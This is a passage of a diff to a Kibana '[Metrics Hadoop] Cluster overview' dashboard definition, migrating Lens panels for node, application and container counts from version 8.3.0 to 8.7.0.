"panelIndex": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4b01387d-bd18-4e16-b860-005e4a71e957", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d846e0a6-42a9-4840-82e4-f217959a63fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c50d822a-587a-4198-90c1-847fe7355fa1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e78473e3-a006-46cf-bada-e75ab9c4b279", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "35726819-8a70-4f5e-b150-1626c191f380": { + "columnOrder": [ + "c4649608-0cba-486f-8aec-460655407f67", + 
"39e015f6-e8f8-4a9a-80e3-2570606d310c", + "09a20c96-905b-40c8-9c40-77bfb5edb5b7", + "3708838a-0567-4295-8e77-3a39aca246cd", + "02f59eb1-8c13-41d6-a537-58fb1f051f84" + ], + "columns": { + "02f59eb1-8c13-41d6-a537-58fb1f051f84": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_lost: *" + }, + "isBucketed": false, + "label": "Lost", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_lost" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 18, - "i": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", - "title": "Number of node managers over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b880f665-29b3-40b9-bd45-459f3105c645", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5199984c-035a-4e47-9d4a-d63d01735d8b": { - "columnOrder": [ - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" - ], - "columns": { - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.nodes.active: *" - }, - "isBucketed": false, - "label": "Active Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.nodes.active" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": 
"appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b880f665-29b3-40b9-bd45-459f3105c645", - "key": "hadoop.cluster.nodes.active", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.nodes.active" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", - "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } + "09a20c96-905b-40c8-9c40-77bfb5edb5b7": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_unhealthy: *" + }, + "isBucketed": false, + "label": "Unhealthy", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_unhealthy" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", - "w": 8, - "x": 24, - "y": 0 - }, - "panelIndex": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", - "title": "Number of active nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b98d7344-acd9-4e73-a62b-a34aee54465c", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5199984c-035a-4e47-9d4a-d63d01735d8b": { - "columnOrder": [ - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" - ], - "columns": { - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { - "customLabel": true, - "dataType": 
"number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.nodes.lost: *" - }, - "isBucketed": false, - "label": "Lost Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.nodes.lost" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b98d7344-acd9-4e73-a62b-a34aee54465c", - "key": "hadoop.cluster.nodes.lost", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.nodes.lost" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", - "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } + "3708838a-0567-4295-8e77-3a39aca246cd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_decommissioned: *" + }, + "isBucketed": false, + "label": "Decommissioned", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_decommissioned" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "9d55a200-501c-45bf-94a9-a3c36744865d", - "w": 8, - "x": 32, - "y": 0 - }, - "panelIndex": "9d55a200-501c-45bf-94a9-a3c36744865d", - "title": "Number of lost nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - 
"type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1965ff1a-73c8-4f6c-be65-230190b5ca22", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5199984c-035a-4e47-9d4a-d63d01735d8b": { - "columnOrder": [ - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" - ], - "columns": { - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.nodes.unhealthy: *" - }, - "isBucketed": false, - "label": "Unhealthy Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.nodes.unhealthy" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1965ff1a-73c8-4f6c-be65-230190b5ca22", - "key": "hadoop.cluster.nodes.unhealthy", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.nodes.unhealthy" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", - "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } + "39e015f6-e8f8-4a9a-80e3-2570606d310c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_active: *" + }, + "isBucketed": false, + "label": "Active", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_active" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + 
"c4649608-0cba-486f-8aec-460655407f67": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4b01387d-bd18-4e16-b860-005e4a71e957", + "key": "hadoop.cluster.node_managers.num_active", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_active" + } + } }, - "gridData": { - "h": 5, - "i": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", - "w": 8, - "x": 40, - "y": 0 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d846e0a6-42a9-4840-82e4-f217959a63fb", + "key": "hadoop.cluster.node_managers.num_unhealthy", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_unhealthy" + } + } }, - "panelIndex": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", - "title": "Number of unhealthy nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6289f262-f60c-4d6c-9480-c8d037633755", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "faa4a447-faac-4424-9e42-5a29b0ad1137": { - 
"columnOrder": [ - "55139a89-d014-4b5e-9195-8d7874ae4a47", - "aac01fd6-85b3-4678-a105-90b6bfef291a", - "2c271321-b9d9-4fc0-8bb4-0483f527c16b", - "88d60efa-e82b-43e6-bd18-e523c386af79" - ], - "columns": { - "2c271321-b9d9-4fc0-8bb4-0483f527c16b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.applications.pending: *" - }, - "isBucketed": false, - "label": "Pending", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.applications.pending" - }, - "55139a89-d014-4b5e-9195-8d7874ae4a47": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "88d60efa-e82b-43e6-bd18-e523c386af79": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.applications.failed: *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.applications.failed" - }, - "aac01fd6-85b3-4678-a105-90b6bfef291a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.applications.running: *" - }, - "isBucketed": false, - "label": "Running", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.applications.running" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6289f262-f60c-4d6c-9480-c8d037633755", - "key": 
"hadoop.cluster.applications.running", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.applications.running" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", - "key": "hadoop.cluster.applications.pending", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.applications.pending" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", - "key": "hadoop.cluster.applications.failed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.applications.failed" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "aac01fd6-85b3-4678-a105-90b6bfef291a", - "2c271321-b9d9-4fc0-8bb4-0483f527c16b", - "88d60efa-e82b-43e6-bd18-e523c386af79" - ], - "layerId": "faa4a447-faac-4424-9e42-5a29b0ad1137", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "55139a89-d014-4b5e-9195-8d7874ae4a47", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "aac01fd6-85b3-4678-a105-90b6bfef291a" - }, - { - "axisMode": "left", - "forAccessor": "2c271321-b9d9-4fc0-8bb4-0483f527c16b" - }, - { - "axisMode": "left", - "forAccessor": "88d60efa-e82b-43e6-bd18-e523c386af79" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - 
"yTitle": "Applications" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c50d822a-587a-4198-90c1-847fe7355fa1", + "key": "hadoop.cluster.node_managers.num_decommissioned", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_decommissioned" + } + } }, - "gridData": { - "h": 18, - "i": "d78560b6-a798-4b6b-b702-252c1319af9c", - "w": 24, - "x": 24, - "y": 5 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e78473e3-a006-46cf-bada-e75ab9c4b279", + "key": "hadoop.cluster.node_managers.num_lost", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_lost" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "d78560b6-a798-4b6b-b702-252c1319af9c", - "title": "Number of applications over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { - "columnOrder": [ - "36a555dc-487f-4e1c-a3ae-2afa0f535519" - ], - "columns": { - "36a555dc-487f-4e1c-a3ae-2afa0f535519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.containers.allocated: *" - }, - 
"isBucketed": false, - "label": "Containers Allocated", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.containers.allocated" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", - "key": "hadoop.cluster.containers.allocated", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.containers.allocated" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", - "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 5, - "i": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", - "w": 8, - "x": 0, - "y": 18 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", - "title": "Number of containers allocated [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { - "columnOrder": [ - "36a555dc-487f-4e1c-a3ae-2afa0f535519" - ], 
- "columns": { - "36a555dc-487f-4e1c-a3ae-2afa0f535519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.containers.pending: *" - }, - "isBucketed": false, - "label": "Containers Pending", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.containers.pending" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", - "key": "hadoop.cluster.containers.pending", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.containers.pending" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", - "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "layers": [ + { + "accessors": [ + "39e015f6-e8f8-4a9a-80e3-2570606d310c", + "09a20c96-905b-40c8-9c40-77bfb5edb5b7", + "3708838a-0567-4295-8e77-3a39aca246cd", + "02f59eb1-8c13-41d6-a537-58fb1f051f84" + ], + "layerId": "35726819-8a70-4f5e-b150-1626c191f380", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "c4649608-0cba-486f-8aec-460655407f67", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "39e015f6-e8f8-4a9a-80e3-2570606d310c" + }, + { + "axisMode": "left", + "forAccessor": "09a20c96-905b-40c8-9c40-77bfb5edb5b7" + }, + { + "axisMode": "left", + "forAccessor": "3708838a-0567-4295-8e77-3a39aca246cd" + }, + { + "axisMode": "left", + "forAccessor": 
"02f59eb1-8c13-41d6-a537-58fb1f051f84" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "gridData": { - "h": 5, - "i": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", - "w": 8, - "x": 8, - "y": 18 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", - "title": "Number of containers pending [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Node Managers" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d1592d8a-7e50-4768-a449-a05551db392d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { - "columnOrder": [ - "36a555dc-487f-4e1c-a3ae-2afa0f535519" - ], - "columns": { - "36a555dc-487f-4e1c-a3ae-2afa0f535519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.containers.reserved: *" - }, - "isBucketed": false, - "label": "Containers Reserved", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.containers.reserved" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d1592d8a-7e50-4768-a449-a05551db392d", - "key": "hadoop.cluster.containers.reserved", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.containers.reserved" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - 
}, - "visualization": { - "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", - "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "589a1406-7ccf-49b7-a6b7-618841e3339b", - "w": 8, - "x": 16, - "y": 18 - }, - "panelIndex": "589a1406-7ccf-49b7-a6b7-618841e3339b", - "title": "Number of containers reserved [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Cluster overview", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-cb235590-cd24-11ec-be30-1d9331f0b107", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:4b01387d-bd18-4e16-b860-005e4a71e957", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:d846e0a6-42a9-4840-82e4-f217959a63fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:c50d822a-587a-4198-90c1-847fe7355fa1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:e78473e3-a006-46cf-bada-e75ab9c4b279", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" + "title": "Number of node managers over time [Metrics Hadoop]" + 
}, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", + "w": 8, + "x": 24, + "y": 0 }, - { - "id": "metrics-*", - "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:b880f665-29b3-40b9-bd45-459f3105c645", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9d55a200-501c-45bf-94a9-a3c36744865d:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" + "panelIndex": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b880f665-29b3-40b9-bd45-459f3105c645", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5199984c-035a-4e47-9d4a-d63d01735d8b": { + "columnOrder": [ + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" + ], + "columns": { + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.nodes.active: *" + }, + "isBucketed": false, + "label": "Active Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.nodes.active" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b880f665-29b3-40b9-bd45-459f3105c645", + "key": "hadoop.cluster.nodes.active", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.nodes.active" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", + "layerId": 
"5199984c-035a-4e47-9d4a-d63d01735d8b", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "9d55a200-501c-45bf-94a9-a3c36744865d:b98d7344-acd9-4e73-a62b-a34aee54465c", - "type": "index-pattern" + "title": "Number of active nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "9d55a200-501c-45bf-94a9-a3c36744865d", + "w": 8, + "x": 32, + "y": 0 }, - { - "id": "metrics-*", - "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" + "panelIndex": "9d55a200-501c-45bf-94a9-a3c36744865d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b98d7344-acd9-4e73-a62b-a34aee54465c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5199984c-035a-4e47-9d4a-d63d01735d8b": { + "columnOrder": [ + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" + ], + "columns": { + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.nodes.lost: *" + }, + "isBucketed": false, + "label": "Lost Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.nodes.lost" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b98d7344-acd9-4e73-a62b-a34aee54465c", + "key": 
"hadoop.cluster.nodes.lost", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.nodes.lost" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", + "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:1965ff1a-73c8-4f6c-be65-230190b5ca22", - "type": "index-pattern" + "title": "Number of lost nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", + "w": 8, + "x": 